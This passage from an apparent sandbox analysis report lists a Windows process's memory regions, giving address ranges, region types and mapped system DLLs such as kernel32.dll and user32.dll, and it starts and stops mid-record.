0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 2771 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 2772 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2777 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 2778 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x77b20000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2779 start_va = 0x7fefdd60000 end_va = 0x7fefddcafff entry_point = 0x7fefdd60000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2780 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2781 start_va = 0x70000 end_va = 0xd6fff entry_point = 0x70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2782 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 2783 start_va = 0x320000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 2784 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2785 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2786 start_va = 0x140000000 end_va = 0x140038fff entry_point = 0x0 region_type = private name = "private_0x0000000140000000" filename = "" Region: id = 2787 start_va = 0x7feff1c0000 end_va = 0x7feff1defff entry_point = 0x7feff1c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2788 start_va = 0x7feff5a0000 end_va = 0x7feff63efff entry_point = 0x7feff5a0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2789 start_va = 0x7feffc50000 end_va = 0x7feffd7cfff entry_point = 0x7feffc50000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2796 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2798 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2799 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2801 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2802 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2804 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2805 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2807 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2808 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2810 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2811 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2813 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2814 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2816 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2817 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2819 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2820 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2822 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2823 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2825 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2826 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2828 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2829 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2831 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2832 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2834 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2835 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2837 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2838 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2840 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2841 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2843 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2844 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2846 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2847 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2849 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2850 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2852 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2853 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2855 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2856 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2858 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2859 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2861 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2862 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2864 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2865 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2867 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2868 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2870 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2871 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2873 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2874 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2876 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2877 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2879 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2880 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2882 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2883 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2885 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2886 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2888 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2889 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2891 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2892 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2894 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2895 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2897 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2898 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2900 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2901 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2903 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2904 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2906 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2907 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2909 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2910 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2912 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2913 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2915 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2916 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2918 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2919 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2921 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2922 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2924 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2925 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2927 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2928 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2930 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2931 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2933 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2934 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2936 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2937 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2939 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2940 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2942 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2943 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2945 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2946 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2948 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2949 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2951 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2984 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2986 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2987 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2989 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2990 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2992 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2993 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2995 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2996 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2998 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2999 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3001 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3002 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3004 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3005 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3007 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3008 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3010 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3011 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3013 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3014 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3016 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3017 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3019 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3020 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3022 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3023 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3025 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3026 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3028 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3029 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3031 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3032 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3034 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3035 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3037 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3038 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3040 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3074 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3076 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3077 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3079 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3080 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3082 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3083 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3085 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3086 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3088 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3089 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3091 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3092 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3094 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3095 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3097 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3098 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x77a20000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3099 start_va = 0x7fefdf60000 end_va = 0x7fefdfc6fff entry_point = 0x7fefdf60000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3100 start_va = 0x7feff860000 end_va = 0x7feff86dfff entry_point = 0x7feff860000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3101 start_va = 0x7feff4d0000 end_va = 0x7feff598fff entry_point = 0x7feff4d0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3102 start_va = 0x290000 end_va = 0x2b8fff entry_point = 0x290000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3103 start_va = 0x460000 end_va = 0x5e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3104 start_va = 0x290000 end_va = 0x2b8fff entry_point = 0x290000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3105 start_va = 0x7fefed60000 end_va = 0x7fefed8dfff entry_point = 0x7fefed60000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3106 start_va = 0x7feff1e0000 end_va = 0x7feff2e8fff entry_point = 0x7feff1e0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3107 start_va = 0x5f0000 end_va = 0x770fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 3108 start_va = 0x780000 end_va = 0x1b7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 3109 start_va = 0xf0000 end_va = 0xf6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 3110 start_va = 0x100000 end_va = 0x101fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 3111 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 3112 start_va = 0x2a0000 end_va = 0x2a0fff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 3113 start_va = 0x1b80000 end_va = 0x1f72fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 3114 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3116 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3117 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3119 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3120 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3122 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3123 start_va = 0x7feff0e0000 end_va = 0x7feff1bafff entry_point = 0x7feff0e0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3124 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3126 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3127 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3129 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3130 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3132 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3133 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3135 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3136 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3138 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3139 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3141 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3181 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3183 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3184 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3186 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3187 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3189 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3190 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3192 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3193 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3195 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3196 